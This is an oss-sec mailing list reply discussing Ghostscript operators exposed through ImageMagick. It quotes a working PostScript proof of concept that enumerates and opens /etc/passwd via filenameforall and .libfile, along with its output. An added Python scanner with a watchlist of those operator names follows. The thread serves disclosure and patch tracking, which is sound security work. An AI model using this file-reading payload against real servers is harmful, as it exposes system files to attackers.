oss-sec mailing list archives
Re: ImageMagick identify "d:" hangs
From: Florian Weimer <fw () deneb enyo de>
Date: Thu, 29 Sep 2016 08:25:54 +0200

* Tavis Ormandy:

> Here is the code I'm testing with (Note: I really don't know much
> postscript - and I hate it).
>
> $ cat test.ps
> /dumpname {
>     dup             % copy filename
>     dup             % copy filename
>     print           % print filename
>     (\n) print      % print newline
>     status          % stat filename
>     {
>         (stat succeeded\n) print
>         ( ctime:) print 64 string cvs print
>         ( atime:) print 64 string cvs print
>         ( size:) print 64 string cvs print
>         ( blocks:) print 64 string cvs print
>         (\n) print
>         (\n) print
>     }{
>         (unable to stat\n\n) print
>     } ifelse
>     .libfile        % open as library
>     {
>         (.libfile returned file\n\n) print
>         64 string readstring
>         pop         % discard result (should probably test)
>         print
>         (\n) print
>     }{
>         (.libfile returned string\n) print
>         print
>         (\n) print
>     } ifelse
> } def
>
> (/etc/pass*) /dumpname load 256 string filenameforall

filenameforall was fixed as part of this:

  http://git.ghostscript.com/?p=ghostpdl.git;a=commit;h=ab109aaeb3ddba59518b036fb288402a65cf7ce8
  http://bugs.ghostscript.com/show_bug.cgi?id=694724

This also covers getenv and has already been assigned CVE-2013-5653.

> $ identify test.ps
> /etc/passwd
> stat succeeded
> ctime:1474998792 atime:1474998792 size:2662 blocks:8
>
> .libfile returned file

.libfile is not yet fixed upstream.  I reported this upstream:

  http://bugs.ghostscript.com/show_bug.cgi?id=697169
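
For triage on the defender's side, the following added example (not part of the original message, and not code from Ghostscript or ImageMagick) scans PostScript text for the operator names mentioned in this thread, skipping comments and string literals so that only name tokens are reported. The function name `scan_postscript`, the watchlist and the sample input are assumptions constructed for illustration.

```python
# Added example, not from the thread. Operator names are the ones named above.
WATCHLIST = {"filenameforall", ".libfile", "status", "getenv"}
WHITESPACE = set(" \t\r\n\f\0")
DELIMS = set("()<>[]{}/%")

# Constructed input: abridged from the quoted test.ps, used only as scanner input.
SAMPLE = r"""/dumpname {
    dup print (\n) print
    status          % stat filename
    { (stat succeeded\n) print } { (unable to stat\n\n) print } ifelse
    .libfile        % open as library
    { (.libfile returned file\n\n) print } { (.libfile returned string\n) print } ifelse
} def
(/etc/pass*) /dumpname load 256 string filenameforall
"""

def scan_postscript(text):
    """Return (line_number, name) for each watchlisted name token in program text."""
    hits, i, line, n = [], 0, 1, len(text)
    while i < n:
        c = text[i]
        if c == "%":                          # comment: ignore to end of line
            while i < n and text[i] != "\n":
                i += 1
        elif c == "(":                        # string literal, parentheses may nest
            depth, i = 1, i + 1
            while i < n and depth:
                if text[i] == "\\":
                    i += 1                    # step onto the escaped character
                elif text[i] == "(":
                    depth += 1
                elif text[i] == ")":
                    depth -= 1
                if i < n and text[i] == "\n":
                    line += 1
                i += 1
        elif c in WHITESPACE or c in DELIMS:
            line += c == "\n"
            i += 1
        else:                                 # name or number token
            start = i
            while i < n and text[i] not in WHITESPACE and text[i] not in DELIMS:
                i += 1
            if text[start:i] in WATCHLIST:
                hits.append((line, text[start:i]))
    return hits

if __name__ == "__main__":
    for lineno, name in scan_postscript(SAMPLE):
        print(f"line {lineno}: {name}")
```

Names can also be assembled at run time, so an empty result is not evidence that a file is safe; the scan is a triage aid and not a substitute for the upstream fixes.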